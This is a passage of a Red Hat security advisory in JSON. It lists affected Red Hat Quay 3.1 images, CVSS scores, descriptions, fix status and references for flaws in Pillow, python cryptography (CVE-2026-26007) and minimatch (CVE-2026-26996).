"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
